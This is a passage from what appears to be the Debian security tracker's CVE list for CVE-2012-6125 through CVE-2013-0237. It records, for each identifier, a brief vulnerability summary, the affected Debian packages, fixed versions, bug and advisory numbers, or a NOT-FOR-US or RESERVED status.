	[squeeze] - ircd-hybrid 7.2.2.dfsg.2-6.2+squeeze1
	- oftc-hybrid
CVE-2013-0237 [wordpress: XSS in external library Plupload fixed in 3.5.1]
	RESERVED
	- wordpress 3.5.1+dfsg-1 (bug #698929)
	NOTE: http://wordpress.org/news/2013/01/wordpress-3-5-1/
	NOTE: CVE request http://www.openwall.com/lists/oss-security/2013/01/25/7
CVE-2013-0236 [wordpress: XSS fixed in 3.5.1]
	RESERVED
	- wordpress 3.5.1+dfsg-1 (bug #698927)
	NOTE: http://wordpress.org/news/2013/01/wordpress-3-5-1/
	NOTE: CVE request http://www.openwall.com/lists/oss-security/2013/01/25/7
CVE-2013-0235 [wordpress: server-side request forgery and remote port scanning using pingbacks]
	RESERVED
	- wordpress 3.5.1+dfsg-1 (bug #698916)
	NOTE: http://wordpress.org/news/2013/01/wordpress-3-5-1/
	NOTE: CVE request http://www.openwall.com/lists/oss-security/2013/01/25/7
CVE-2013-0234
	RESERVED
	- elgg (bug #526197)
CVE-2013-0233 (Devise gem 2.2.x before 2.2.3, 2.1.x before 2.1.3, 2.0.x before 2.0.5, ...)
	- ruby-devise (bug #691525)
CVE-2013-0232 (includes/functions.php in ZoneMinder Video Server 1.24.0, 1.25.0, and ...)
	{DSA-2640-1}
	- zoneminder 1.25.0-4 (bug #698910)
	NOTE: https://bugzilla.redhat.com/show_bug.cgi?id=904103
	NOTE: Upstream forum post: http://www.zoneminder.com/forums/viewtopic.php?f=29&t=20771
CVE-2013-0231 (The pciback_enable_msi function in the PCI backend driver ...)
	{DSA-2632-1}
	- linux 3.2.41-1
	- linux-2.6
CVE-2013-0230 (Stack-based buffer overflow in the ExecuteSoapAction function in the ...)
	- miniupnpd
CVE-2013-0229 (The ProcessSSDPRequest function in minissdp.c in the SSDP handler in ...)
	- miniupnpd
CVE-2013-0228 (The xen_iret function in arch/x86/xen/xen-asm_32.S in the Linux kernel ...)
	- linux 3.2.39-1
	- linux-2.6
	[squeeze] - linux-2.6 2.6.32-48
	NOTE: was actually fixed in 2.6.32-46squeeze1 but upload was done and no DSA was released for that version.
CVE-2013-0227 (Cross-site scripting (XSS) vulnerability in the Search API Sorts ...)
	NOT-FOR-US: Drupal addon
CVE-2013-0226 (The Keyboard Shortcut Utility module 7.x-1.x before 7.x-1.1 for Drupal ...)
	NOT-FOR-US: Drupal addon
CVE-2013-0225 (Cross-site scripting (XSS) vulnerability in the User Relationships ...)
	NOT-FOR-US: Drupal addon
CVE-2013-0224 (The Video module 7.x-2.x before 7.x-2.9 for Drupal, when using the ...)
	NOT-FOR-US: Drupal addon
CVE-2013-0223
	RESERVED
	- coreutils (Affected patch not added to Debian package)
	NOTE: http://www.openwall.com/lists/oss-security/2013/01/21/14
CVE-2013-0222
	RESERVED
	- coreutils (Affected patch not added to Debian package)
	NOTE: http://www.openwall.com/lists/oss-security/2013/01/21/14
CVE-2013-0221
	RESERVED
	- coreutils (Affected patch not added to Debian package)
	NOTE: http://www.openwall.com/lists/oss-security/2013/01/21/14
CVE-2013-0220 (The (1) sss_autofs_cmd_getautomntent and (2) ...)
	- sssd 1.8.4-2 (bug #698871)
CVE-2013-0219 (System Security Services Daemon (SSSD) before 1.9.4, when (1) ...)
	- sssd 1.8.4-2 (bug #698871)
CVE-2013-0218 (The GUI installer in JBoss Enterprise Application Platform (EAP) and ...)
	- jbossas4 (Only builds a few libraries, not the full application server, #581226)
CVE-2013-0217 (Memory leak in drivers/net/xen-netback/netback.c in the Xen netback ...)
	- linux 3.2.39-1
	- linux-2.6
	[squeeze] - linux-2.6 2.6.32-48
CVE-2013-0216 (The Xen netback functionality in the Linux kernel before 3.7.8 allows ...)
	- linux 3.2.39-1
	- linux-2.6
	[squeeze] - linux-2.6 2.6.32-48
CVE-2013-0215 (oxenstored in Xen 4.1.x, Xen 4.2.x, and xen-unstable does not properly ...)
	- xen (ocaml version of the xenstore daemon not used in Debian)
CVE-2013-0214 (Cross-site request forgery (CSRF) vulnerability in the Samba Web ...)
	{DSA-2617-1}
	- samba 2:3.6.6-5
CVE-2013-0213 (The Samba Web Administration Tool (SWAT) in Samba 3.x before 3.5.21, ...)
	{DSA-2617-1}
	- samba 2:3.6.6-5
CVE-2013-0212 (store/swift.py in OpenStack Glance Essex (2012.1), Folsom (2012.2) ...)
	- glance 2012.1.1-4
CVE-2013-0211
	RESERVED
	- libarchive 3.0.4-3 (bug #703957)
CVE-2013-0210
	RESERVED
CVE-2013-0209 (lib/MT/Upgrade.pm in mt-upgrade.cgi in Movable Type 4.2x and 4.3x ...)
	{DSA-2611-1}
	- movabletype-opensource 5.1.2+dfsg-1 (bug #697666)
	NOTE: Versions 5.0 or higher not affected
CVE-2013-0208 (The boot-from-volume feature in OpenStack Compute (Nova) Folsom and ...)
	- nova 2012.1.1-12
CVE-2013-0207 (Cross-site request forgery (CSRF) vulnerability in the Mark Complete ...)
	NOT-FOR-US: module for Drupal
CVE-2013-0206 (Unrestricted file upload vulnerability in the Live CSS module 6.x-2.x ...)
	NOT-FOR-US: module for Drupal
CVE-2013-0205 (Cross-site request forgery (CSRF) vulnerability in the RESTful Web ...)
	NOT-FOR-US: module for Drupal
CVE-2013-0204 [Code execution in external storage]
	RESERVED
	- owncloud (Vulnerable code not present, only affects 4.5 branch)
	NOTE: http://owncloud.org/about/security/advisories/oC-SA-2013-002/
CVE-2013-0203 [XSS vulnerabilities]
	RESERVED
	- owncloud 4.0.8debian-1.4 (bug #698737)
	[wheezy] - owncloud 4.0.4debian2-3.3
	NOTE: http://owncloud.org/about/security/advisories/oC-SA-2013-001/
CVE-2013-0202 [XSS vulnerabilities]
	RESERVED
	- owncloud 4.0.8debian-1.4 (bug #698737)
	[wheezy] - owncloud 4.0.4debian2-3.3
	NOTE: http://owncloud.org/about/security/advisories/oC-SA-2013-001/
CVE-2013-0201 [XSS vulnerabilities]
	RESERVED
	- owncloud 4.0.8debian-1.4 (bug #698737)
	[wheezy] - owncloud 4.0.4debian2-3.3
	NOTE: http://owncloud.org/about/security/advisories/oC-SA-2013-001/
CVE-2013-0200 (HP Linux Imaging and Printing (HPLIP) through 3.12.4 allows local ...)
	- hplip 3.12.6-3.1 (bug #701185)
CVE-2013-0199
	RESERVED
	NOT-FOR-US: FreeIPA
CVE-2013-0198 (Dnsmasq before 2.66test2, when used with certain libvirt ...)
	- dnsmasq (low)
	[wheezy] - dnsmasq (Minor issue)
	[squeeze] - dnsmasq (Minor issue)
	NOTE: CVE request http://www.openwall.com/lists/oss-security/2013/01/18/2
CVE-2013-0197 [XSS vulnerability with match_type filter]
	RESERVED
	- mantis (This only affects the 1.2.12 version, which isn't present in Debian, bug #698481)
	NOTE: http://www.mantisbt.org/bugs/view.php?id=15373
CVE-2013-0196
	RESERVED
CVE-2013-0195 [Unspecified XSS]
	RESERVED
	- piwik (bug #506933)
	NOTE: http://piwik.org/blog/2013/01/piwik-1-10/
CVE-2013-0194 [Unspecified XSS]
	RESERVED
	- piwik (bug #506933)
	NOTE: http://piwik.org/blog/2013/01/piwik-1-10/
CVE-2013-0193 [Unspecified XSS]
	RESERVED
	- piwik (bug #506933)
	NOTE: http://piwik.org/blog/2013/01/piwik-1-10/
CVE-2013-0192
	RESERVED
	NOT-FOR-US: Simple Machines Forum
CVE-2013-0188
	RESERVED
CVE-2013-0190 (The xen_failsafe_callback function in Xen for the Linux kernel 2.6.23 ...)
	- linux 3.2.39-1
	- linux-2.6
	[squeeze] - linux-2.6 2.6.32-47
CVE-2013-0189 (cachemgr.cgi in Squid 3.1.x and 3.2.x, possibly 3.1.22, 3.2.4, and ...)
	{DSA-2631-1}
	- squid 2.7.STABLE9-2
	NOTE: squid-cgi was removed in 2.7.STABLE9-2
	- squid3 3.1.20-2.1 (bug #696187)
	NOTE: possible regression, see #701123
CVE-2013-0191 [pam-pgsql NULL password handling issue]
	RESERVED
	- pam-pgsql 0.7.3.1-4 (bug #698241)
	[squeeze] - pam-pgsql 0.7.1-4+squeeze2
	NOTE: patch: https://sourceforge.net/u/lvella/pam-pgsql/ci/9361f5970e5dd90a747319995b67c2f73b91448c/
	NOTE: bugreport: https://sourceforge.net/p/pam-pgsql/bugs/13/
CVE-2013-0187
	RESERVED
CVE-2013-0186
	RESERVED
CVE-2013-0185
	RESERVED
CVE-2013-0184 (Unspecified vulnerability in Rack::Auth::AbstractRequest in Rack 1.1.x ...)
	- ruby-rack 1.4.1-2.1 (bug #698440)
	- librack-ruby
CVE-2013-0183 (multipart/parser.rb in Rack 1.3.x before 1.3.8 and 1.4.x before 1.4.3 ...)
	- ruby-rack 1.4.1-2.1 (bug #698440)
	- librack-ruby
CVE-2013-0182 (The Payment module 7.x-1.x before 7.x-1.3 for Drupal does not properly ...)
	NOT-FOR-US: Drupal module Payment
CVE-2013-0181 (Cross-site scripting (XSS) vulnerability in Views in the Search API ...)
	NOT-FOR-US: Drupal module search_api
CVE-2013-0180
	RESERVED
CVE-2013-0179 [memcached DoS]
	RESERVED
	- memcached 1.4.13-0.2 (low; bug #698231)
	[squeeze] - memcached (Minor issue)
	NOTE: https://bugzilla.redhat.com/show_bug.cgi?id=895054
	NOTE: https://code.google.com/p/memcached/issues/detail?id=306
	NOTE: https://code.google.com/p/memcached/issues/attachmentText?id=306&aid=3060004000&name=0001-Fix-buffer-overrun-when-logging-key-to-delete-in-bin.patch
CVE-2013-0178 [redis 2.4: Insecure temporary file use for redis service's vm swap file]
	RESERVED
	- redis 2:2.6.0-1 (low)
	[squeeze] - redis (Minor issue)
	[wheezy] - redis (Minor issue)
	NOTE: RedHat bugreport mentions 2.4 is affected, but not 2.6
CVE-2013-0177
	RESERVED
	NOT-FOR-US: OFBiz
CVE-2013-0176 (The publickey_from_privatekey function in libssh before 0.5.4, when no ...)
	- libssh 0.5.4-1 (low; bug #698963)
	[squeeze] - libssh (Minor issue)
	NOTE: http://www.libssh.org/2013/01/22/libssh-0-5-4-security-release/
	NOTE: http://git.libssh.org/projects/libssh.git/commit/?h=v0-5&id=55b09f426417406bb25c0b9c474fbab1398b0dc8
CVE-2013-0175 (multi_xml gem 0.5.2 for Ruby, as used in Grape before 0.2.6 and ...)
	- ruby-multi-xml (bug #691189)
	NOTE: fixed in https://rubygems.org/gems/multi_xml/versions/0.5.2
CVE-2013-0174
	RESERVED
CVE-2013-0173
	RESERVED
CVE-2013-0172 (Samba 4.0.x before 4.0.1, in certain Active Directory ...)
	- samba4 4.0.0~beta2+dfsg1-3.1 (high; bug #699188)
	- samba (Only affects Active Directory functionality)
	NOTE: https://lists.samba.org/archive/samba-technical/2013-January/089911.html
CVE-2013-0171
	RESERVED
CVE-2013-0170 (Use-after-free vulnerability in the virNetMessageFree function in ...)
	- libvirt 0.9.12-6 (bug #699224)
	[squeeze] - libvirt (Vulnerable code not present, see bug #699224)
	NOTE: https://bugzilla.redhat.com/show_bug.cgi?id=893450
	NOTE: http://libvirt.org/git/?p=libvirt.git;a=commit;h=46532e3e8ed5f5a736a02f67d6c805492f9ca720
CVE-2013-0169 (The TLS protocol 1.1 and 1.2 and the DTLS protocol 1.0 and 1.2, as ...)
	{DSA-2622-1 DSA-2621-1}
	- openssl 1.0.1e-1 (bug #699889)
	- bouncycastle 1.48+dfsg-2 (low; bug #699885)
	[wheezy] - bouncycastle (Minor issue)
	[squeeze] - bouncycastle (Minor issue)
	- mysql-5.1
	- mysql-5.5 5.5.30+dfsg-1.1 (bug #699886)
	- polarssl 1.1.4-2 (bug #699887)
	- nss 2:3.14.3-1 (bug #699888)
	- gnutls26 2.12.20-4
	- gnutls28 3.0.22-3
	- openjdk-7 7u3-2.1.6-1
	- openjdk-6 6b27-1.12.3-1
	NOTE: http://www.isg.rhul.ac.uk/tls/TLStiming.pdf
CVE-2013-0168 (The MoveDisk command in Red Hat Enterprise Virtualization Manager ...)
	NOTE: RHEV management tool
CVE-2013-0167
	RESERVED
CVE-2013-0166 (OpenSSL before 0.9.8y, 1.0.0 before 1.0.0k, and 1.0.1 before 1.0.1d ...)
	{DSA-2621-1}
	- openssl 1.0.1e-1 (bug #699889)
CVE-2013-0165
	RESERVED
CVE-2013-0164 (The lockwrap function in port-proxy/bin/openshift-port-proxy-cfg in ...)
	NOT-FOR-US: OpenShift
CVE-2013-0163
	RESERVED
CVE-2013-0162 (The diff_pp function in lib/gauntlet_rubyparser.rb in the ruby_parser ...)
	- ruby-parser 2.3.1-2 (bug #701637)
	NOTE: http://www.openwall.com/lists/oss-security/2013/02/22/5
CVE-2013-0161
	RESERVED
	NOT-FOR-US: Havalite CMS
CVE-2013-0160 (The Linux kernel through 3.7.9 allows local users to obtain sensitive ...)
	{DSA-2669-1}
	- linux (unimportant)
	- linux-2.6 (unimportant)
	NOTE: Minor information leak, rather a missing hardening feature than a security vulnerability.
CVE-2013-0159
	RESERVED
	NOT-FOR-US: Fedora build script
CVE-2013-0158 (Unspecified vulnerability in CloudBees Jenkins before 1.498, Jenkins ...)
	- jenkins 1.480.2+dfsg-1~exp1 (bug #697617)
	NOTE: https://wiki.jenkins-ci.org/display/SECURITY/Jenkins+Security+Advisory+2013-01-04
CVE-2013-0157 [mount discloses information about existence of folders]
	RESERVED
	- util-linux (bug #697464; low)
	[squeeze] - util-linux (Minor issue)
	[wheezy] - util-linux (Minor issue)
CVE-2013-0156 (active_support/core_ext/hash/conversions.rb in Ruby on Rails before ...)
	{DSA-2604-1}
	- rails 2.3.14.1 (bug #697722; high)
	- ruby-activesupport-2.3 2.3.14-5 (bug #697789)
	- ruby-activesupport-3.2 3.2.6-5 (bug #697790)
	NOTE: Starting with 2.3.14.1 rails is a transition package
	NOTE: http://www.insinuator.net/2013/01/rails-yaml/
	NOTE: http://www.openwall.com/lists/oss-security/2013/01/08/14
	NOTE: experimental has 3.2.8-1 and should be affected too
CVE-2013-0155 (Ruby on Rails 3.0.x before 3.0.19, 3.1.x before 3.1.10, and 3.2.x ...)
	{DSA-2609-1}
	- ruby-activerecord-3.2 3.2.6-4 (bug #697744)
	- ruby-activerecord-2.3 2.3.14-4
	- ruby-actionpack-3.2 3.2.6-5 (bug #697802)
	- rails 2.3.14.1
	NOTE: Starting with 2.3.14.1 rails is a transition package
	NOTE: http://www.openwall.com/lists/oss-security/2013/01/08/13
CVE-2013-0154 (The get_page_type function in xen/arch/x86/mm.c in Xen 4.2, when ...)
	- xen (Only applies to Xen 4.2, which is only available in experimental)
CVE-2013-0153 (The AMD IOMMU support in Xen 4.2.x, 4.1.x, 3.3, and other versions, ...)
	{DSA-2636-1}
	- xen 4.1.4-2
CVE-2013-0152 (Memory leak in Xen 4.2 and unstable allows local HVM guests to cause a ...)
	- xen (Only applies to Xen 4.2, which is only available in experimental)
CVE-2013-0151 (The do_hvm_op function in xen/arch/x86/hvm/hvm.c in Xen 4.2.x on the ...)
	- xen (Only applies to Xen 4.2, which is only available in experimental)
CVE-2013-0150
	RESERVED
CVE-2013-0149
	RESERVED
CVE-2013-0148
	RESERVED
CVE-2013-0147
	RESERVED
CVE-2013-0146
	RESERVED
CVE-2013-0145 (Buffer overflow in the TFTPD service in Serva32 2.1.0 allows remote ...)
	TODO: check
CVE-2013-0144
	RESERVED
CVE-2013-0143
	RESERVED
CVE-2013-0142
	RESERVED
CVE-2013-0141 (Directory traversal vulnerability in McAfee ePolicy Orchestrator (ePO) ...)
	NOT-FOR-US: McAfee ePolicy Orchestrator
CVE-2013-0140 (SQL injection vulnerability in the Agent-Handler component in McAfee ...)
	NOT-FOR-US: McAfee ePolicy Orchestrator
CVE-2013-0139 (The Arecont Vision AV1355DN MegaDome camera allows remote attackers to ...)
	NOT-FOR-US: Arecont Vision
CVE-2013-0138 (BitZipper 2013 before Update 1 allows remote attackers to execute ...)
	NOT-FOR-US: BitZipper
CVE-2013-0137
	RESERVED
CVE-2013-0136
	RESERVED
CVE-2013-0135 (Multiple SQL injection vulnerabilities in PHP Address Book 8.2.5 allow ...)
	NOT-FOR-US: PHP Address Book
CVE-2013-0134 (Cross-site scripting (XSS) vulnerability in the web interface in ...)
	NOT-FOR-US: AirDroid
CVE-2013-0133 (Untrusted search path vulnerability in ...)
	NOT-FOR-US: Parallels Plesk Panel
CVE-2013-0132 (The suexec implementation in Parallels Plesk Panel 11.0.9 contains a ...)
	NOT-FOR-US: Parallels Plesk Panel
CVE-2013-0131 (Buffer overflow in the NVIDIA GPU driver before 304.88, 310.x before ...)
	- nvidia-graphics-drivers 304.88-1 (bug #704547)
	[wheezy] - nvidia-graphics-drivers (Non-free not supported)
	[squeeze] - nvidia-graphics-drivers (Non-free not supported)
	NOTE: http://nvidia.custhelp.com/app/answers/detail/a_id/3290
CVE-2013-0130 (Multiple buffer overflows in Core FTP before 2.2 build 1769 allow ...)
	NOT-FOR-US: Core FTP
CVE-2013-0129 (Multiple cross-site scripting (XSS) vulnerabilities in pd-admin before ...)
	NOT-FOR-US: pd-admin
CVE-2013-0128 (The Contact Customer Support feature in the TigerText Free Private ...)
	NOT-FOR-US: TigerText
CVE-2013-0127 (IBM Lotus Notes 8.x before 8.5.3 FP4 Interim Fix 1 and 9.0 before ...)
	NOT-FOR-US: IBM Lotus Notes
CVE-2013-0126 (Multiple cross-site request forgery (CSRF) vulnerabilities in ...)
	NOT-FOR-US: Verizon router
CVE-2013-0125 (Cross-site scripting (XSS) vulnerability in fileview.asp in C2 ...)
	NOT-FOR-US: C2 WebResource
CVE-2013-0124 (Multiple cross-site scripting (XSS) vulnerabilities in the ...)
	NOT-FOR-US: ASKIA
CVE-2013-0123 (Multiple SQL injection vulnerabilities in the administration interface ...)
	NOT-FOR-US: ASKIA
CVE-2013-0122 (The avast! Mobile Security application before 2.0.4400 for Android ...)
	NOT-FOR-US: avast! Mobile Security application
CVE-2013-0121
	RESERVED
CVE-2013-0120 (The web interface on Dell PowerConnect 6248P switches allows remote ...)
	NOT-FOR-US: Dell Switches
CVE-2013-0119
	RESERVED
CVE-2013-0118 (CS-Cart before 3.0.6, when PayPal Standard Payments is configured, ...)
	NOT-FOR-US: CS-Cart
CVE-2013-0117
	RESERVED
CVE-2013-0116
	RESERVED
CVE-2013-0115
	RESERVED
CVE-2013-0114
	RESERVED
CVE-2013-0113 (Nuance PDF Reader 7.0 and PDF Viewer Plus 7.1 allow remote attackers ...)
	NOT-FOR-US: Nuance PDF Reader
CVE-2013-0112
	RESERVED
CVE-2013-0111 (daemonu.exe (aka the NVIDIA Update Service Daemon), as distributed ...)
	NOT-FOR-US: NVIDIA Update Service Daemon
CVE-2013-0110 (nvSCPAPISvr.exe in the NVIDIA Stereoscopic 3D Driver service, as ...)
	NOT-FOR-US: NVIDIA Stereoscopic 3D Driver service
CVE-2013-0109 (The NVIDIA driver before 307.78, and Release 310 before 311.00, in the ...)
	NOT-FOR-US: NVIDIA Display Driver service on Windows
CVE-2013-0108 (An ActiveX control in HscRemoteDeploy.dll in Honeywell Enterprise ...)
	NOT-FOR-US: Honeywell
CVE-2013-0107 (Stack-based buffer overflow in Foxit Advanced PDF Editor 3 before 3.04 ...)
	NOT-FOR-US: Foxit Advanced PDF Editor
CVE-2013-0106
	RESERVED
CVE-2013-0105
	RESERVED
CVE-2013-0104
	RESERVED
CVE-2013-0103
	RESERVED
CVE-2013-0102
	RESERVED
CVE-2013-0101
	RESERVED
CVE-2012-6323
	RESERVED
CVE-2012-6322
	RESERVED
CVE-2012-6321
	RESERVED
CVE-2012-6320
	RESERVED
CVE-2012-6319
	RESERVED
CVE-2012-6318
	RESERVED
CVE-2012-6317
	RESERVED
CVE-2012-6316
	RESERVED
CVE-2012-6315
	REJECTED
CVE-2012-6314 (Citrix XenDesktop Virtual Desktop Agent (VDA) 5.6.x before 5.6.200, ...)
	NOT-FOR-US: Citrix XenDesktop
CVE-2012-6313 (simple-gmail-login.php in the Simple Gmail Login plugin before 1.1.4 ...)
	NOT-FOR-US: Wordpress plugin
CVE-2012-6312 (Cross-site scripting (XSS) vulnerability in the Video Lead Form plugin ...)
	NOT-FOR-US: Wordpress plugin
CVE-2012-6311
	RESERVED
CVE-2012-6310
	RESERVED
CVE-2012-6309
	RESERVED
CVE-2012-6308
	RESERVED
CVE-2012-6307
	RESERVED
CVE-2012-6306
	RESERVED
CVE-2012-6305
	RESERVED
CVE-2012-6304
	RESERVED
CVE-2012-6303 [WaveSurfer and Snack Sound Toolkit buffer overflows]
	RESERVED
	- snack 2.2.10-dfsg1-12.1 (low; bug #695614)
	[squeeze] - snack 2.2.10-dfsg1-9+squeeze1
	- wavesurfer (originally reported in wavesurfer, but actually a bug in libsnack, see bug #695615)
	NOTE: http://secunia.com/advisories/49889/
	NOTE: http://www.openwall.com/lists/oss-security/2012/12/10/2
CVE-2012-6302
	RESERVED
CVE-2012-6301 (The Browser application in Android 4.0.3 allows remote attackers to ...)
	NOT-FOR-US: Android browser
CVE-2012-6300
	RESERVED
CVE-2012-6299 (Unspecified vulnerability in CA IdentityMinder r12.0 through CR16, ...)
	NOT-FOR-US: CA IdentityMinder
CVE-2012-6298 (Unspecified vulnerability in CA IdentityMinder r12.0 through CR16, ...)
	NOT-FOR-US: CA IdentityMinder
CVE-2012-6297
	RESERVED
CVE-2012-6296
	RESERVED
CVE-2012-6295
	RESERVED
CVE-2012-6294
	RESERVED
CVE-2012-6293
	RESERVED
CVE-2012-6292
	RESERVED
CVE-2012-6291
	RESERVED
CVE-2012-6290
	RESERVED
CVE-2012-6289
	RESERVED
CVE-2012-6288
	RESERVED
CVE-2012-6287
	RESERVED
CVE-2012-6286
	RESERVED
CVE-2012-6285
	RESERVED
CVE-2012-6284
	RESERVED
CVE-2012-6283
	RESERVED
CVE-2012-6282
	RESERVED
CVE-2012-6281
	RESERVED
CVE-2012-6280
	RESERVED
CVE-2012-6279
	RESERVED
CVE-2012-6278
	RESERVED
CVE-2012-6277
	RESERVED
CVE-2012-6276 (Directory traversal vulnerability in the web-based management ...)
	NOT-FOR-US: TP-LINK TL-WR841N
CVE-2012-6275 (Multiple stack-based buffer overflows in AntDS.exe in BigAntSoft ...)
	NOT-FOR-US: BigAnt IM Server
CVE-2012-6274 (BigAntSoft BigAnt IM Message Server does not require authentication ...)
	NOT-FOR-US: BigAnt IM Server
CVE-2012-6273 (SQL injection vulnerability in BigAntSoft BigAnt IM Message Server ...)
	NOT-FOR-US: BigAnt IM Server
CVE-2012-6272 (Multiple cross-site scripting (XSS) vulnerabilities in Dell OpenManage ...)
	NOT-FOR-US: Dell OpenManage Server Administrator
CVE-2012-6271 (Adobe Shockwave Player through 11.6.8.638 allows remote attackers to ...)
	NOT-FOR-US: Adobe Shockwave
CVE-2012-6270 (Adobe Shockwave Player through 11.6.8.638 allows remote attackers to ...)
	NOT-FOR-US: Adobe Shockwave
CVE-2012-6269
	RESERVED
CVE-2012-6268
	RESERVED
CVE-2012-6267
	RESERVED
CVE-2012-6266
	RESERVED
CVE-2012-6265
	RESERVED
CVE-2012-6264
	RESERVED
CVE-2012-6263
	RESERVED
CVE-2012-6262
	RESERVED
CVE-2012-6261
	RESERVED
CVE-2012-6260
	RESERVED
CVE-2012-6259
	RESERVED
CVE-2012-6258
	RESERVED
CVE-2012-6257
	RESERVED
CVE-2012-6256
	RESERVED
CVE-2012-6255
	RESERVED
CVE-2012-6254
	RESERVED
CVE-2012-6253
	RESERVED
CVE-2012-6252
	RESERVED
CVE-2012-6251
	RESERVED
CVE-2012-6250
	RESERVED
CVE-2012-6249
	RESERVED
CVE-2012-6248
	RESERVED
CVE-2012-6247
	RESERVED
CVE-2012-6246
	RESERVED
CVE-2012-6245
	RESERVED
CVE-2012-6244
	RESERVED
CVE-2012-6243
	RESERVED
CVE-2012-6242
	RESERVED
CVE-2012-6241
	RESERVED
CVE-2012-6240
	RESERVED
CVE-2012-6239
	RESERVED
CVE-2012-6238
	RESERVED
CVE-2012-6237
	RESERVED
CVE-2012-6236
	RESERVED
CVE-2012-6235
	RESERVED
CVE-2012-6234
	RESERVED
CVE-2012-6233
	RESERVED
CVE-2012-6232
	RESERVED
CVE-2012-6231
	RESERVED
CVE-2012-6230
	RESERVED
CVE-2012-6229
	RESERVED
CVE-2012-6228
	RESERVED
CVE-2012-6227
	RESERVED
CVE-2012-6226
	RESERVED
CVE-2012-6225
	RESERVED
CVE-2012-6224
	RESERVED
CVE-2012-6223
	RESERVED
CVE-2012-6222
	RESERVED
CVE-2012-6221
	RESERVED
CVE-2012-6220
	RESERVED
CVE-2012-6219
	RESERVED
CVE-2012-6218
	RESERVED
CVE-2012-6217
	RESERVED
CVE-2012-6216
	RESERVED
CVE-2012-6215
	RESERVED
CVE-2012-6214
	RESERVED
CVE-2012-6213
	RESERVED
CVE-2012-6212
	RESERVED
CVE-2012-6211
	RESERVED
CVE-2012-6210
	RESERVED
CVE-2012-6209
	RESERVED
CVE-2012-6208
	RESERVED
CVE-2012-6207
	RESERVED
CVE-2012-6206
	RESERVED
CVE-2012-6205
	RESERVED
CVE-2012-6204
	RESERVED
CVE-2012-6203
	RESERVED
CVE-2012-6202
	RESERVED
CVE-2012-6201
	RESERVED
CVE-2012-6200
	RESERVED
CVE-2012-6199
	RESERVED
CVE-2012-6198
	RESERVED
CVE-2012-6197
	RESERVED
CVE-2012-6196
	RESERVED
CVE-2012-6195
	RESERVED
CVE-2012-6194
	RESERVED
CVE-2012-6193
	RESERVED
CVE-2012-6192
	RESERVED
CVE-2012-6191
	RESERVED
CVE-2012-6190
	RESERVED
CVE-2012-6189
	RESERVED
CVE-2012-6188
	RESERVED
CVE-2012-6187
	RESERVED
CVE-2012-6186
	RESERVED
CVE-2012-6185
	RESERVED
CVE-2012-6184
	RESERVED
CVE-2012-6183
	RESERVED
CVE-2012-6182
	RESERVED
CVE-2012-6181
	RESERVED
CVE-2012-6180
	RESERVED
CVE-2012-6179
	RESERVED
CVE-2012-6178
	RESERVED
CVE-2012-6177
	RESERVED
CVE-2012-6176
	RESERVED
CVE-2012-6175
	RESERVED
CVE-2012-6174
	RESERVED
CVE-2012-6173
	RESERVED
CVE-2012-6172
	RESERVED
CVE-2012-6171
	RESERVED
CVE-2012-6170
	RESERVED
CVE-2012-6169
	RESERVED
CVE-2012-6168
	RESERVED
CVE-2012-6167
	RESERVED
CVE-2012-6166
	RESERVED
CVE-2012-6165
	RESERVED
CVE-2012-6164
	RESERVED
CVE-2012-6163
	RESERVED
CVE-2012-6162
	RESERVED
CVE-2012-6161
	RESERVED
CVE-2012-6160
	RESERVED
CVE-2012-6159
	RESERVED
CVE-2012-6158
	RESERVED
CVE-2012-6157
	RESERVED
CVE-2012-6156
	RESERVED
CVE-2012-6155
	RESERVED
CVE-2012-6154
	RESERVED
CVE-2012-6153
	RESERVED
CVE-2012-6152
	RESERVED
CVE-2012-6151
	RESERVED
CVE-2012-6150
	RESERVED
CVE-2012-6149
	RESERVED
CVE-2012-6148
	RESERVED
CVE-2012-6147
	RESERVED
CVE-2012-6146
	RESERVED
CVE-2012-6145
	RESERVED
CVE-2012-6144
	RESERVED
CVE-2012-6143 [Storable::thaw called on untrusted inputs]
	RESERVED
	- libspoon-perl
	NOTE: https://rt.cpan.org/Public/Bug/Display.html?id=85217
CVE-2012-6142 [Storable::thaw called on untrusted inputs]
	RESERVED
	NOT-FOR-US: HTML-EP CPAN module
	NOTE: https://rt.cpan.org/Public/Bug/Display.html?id=85216
CVE-2012-6141 [Storable::thaw called on untrusted inputs]
	RESERVED
	NOT-FOR-US: App-Context CPAN module
	NOTE: https://rt.cpan.org/Public/Bug/Display.html?id=85215
CVE-2012-6140 (pam_google_authenticator.c in the PAM module in Google Authenticator ...)
	- google-authenticator (bug #666129)
CVE-2012-6139 (libxslt before 1.1.28 allows remote attackers to cause a denial of ...)
	{DSA-2654-1}
	- libxslt 1.1.26-14.1 (bug #703933)
	NOTE: http://git.gnome.org/browse/libxslt/commit/?id=6c99c519d97e5fcbec7a9537d190efb442e4e833
	NOTE: http://git.gnome.org/browse/libxslt/commit/?id=dc11b6b379a882418093ecc8adf11f6166682e8d
CVE-2012-6138
	REJECTED
CVE-2012-6137
	RESERVED
	NOT-FOR-US: Red Hat subscription-manager
CVE-2012-6136
	RESERVED
	NOT-FOR-US: tuned (RH-specific powersaving tool)
CVE-2012-6135
	RESERVED
	- ruby-passenger (Vulnerable code not present; bug #702219)
	NOTE: 4.0.0 betas only
CVE-2012-6134 (Cross-site request forgery (CSRF) vulnerability in the omniauth-oauth2 ...)
	NOT-FOR-US: ruby-omniauth, there was a sponsor request, but no ITP: http://osdir.com/ml/debian-mentors/2011-08/msg00662.html
CVE-2012-6133 [XSS flaws in ok and error messages]
	RESERVED
	- roundup 1.4.20-1
	NOTE: http://issues.roundup-tracker.org/issue2550724
CVE-2012-6132 [XSS flaw with the otk parameter]
	RESERVED
	- roundup 1.4.20-1
CVE-2012-6131 [XSS flaw in @action parameter]
	RESERVED
	- roundup 1.4.20-1
	NOTE: http://issues.roundup-tracker.org/issue2550711
CVE-2012-6130 [XSS vulnerability when usernames contain HTML]
	RESERVED
	- roundup 1.4.20-1
	NOTE: http://issues.roundup-tracker.org/issue2550684
CVE-2012-6129 (Stack-based buffer overflow in utp.cpp in libutp, as used in ...)
	- transmission 2.52-3+nmu1 (bug #700234)
	[squeeze] - transmission (UTP code not present)
CVE-2012-6128 (Multiple stack-based buffer overflows in http.c in OpenConnect before ...)
	{DSA-2623-1}
	- openconnect 3.20-3 (bug #700794)
	NOTE: http://git.infradead.org/users/dwmw2/openconnect.git/commitdiff/26f752c3dbf69227679fc6bebb4ae071aecec491
	NOTE: The fix seems to introduce a possible memory leak as regression, see BTS #700805
CVE-2012-6127
	REJECTED
CVE-2012-6126
	REJECTED
CVE-2012-6125
	RESERVED
	- chicken 4.8.0-1 (low; bug #702410)
	[wheezy] - chicken (Minor issue)
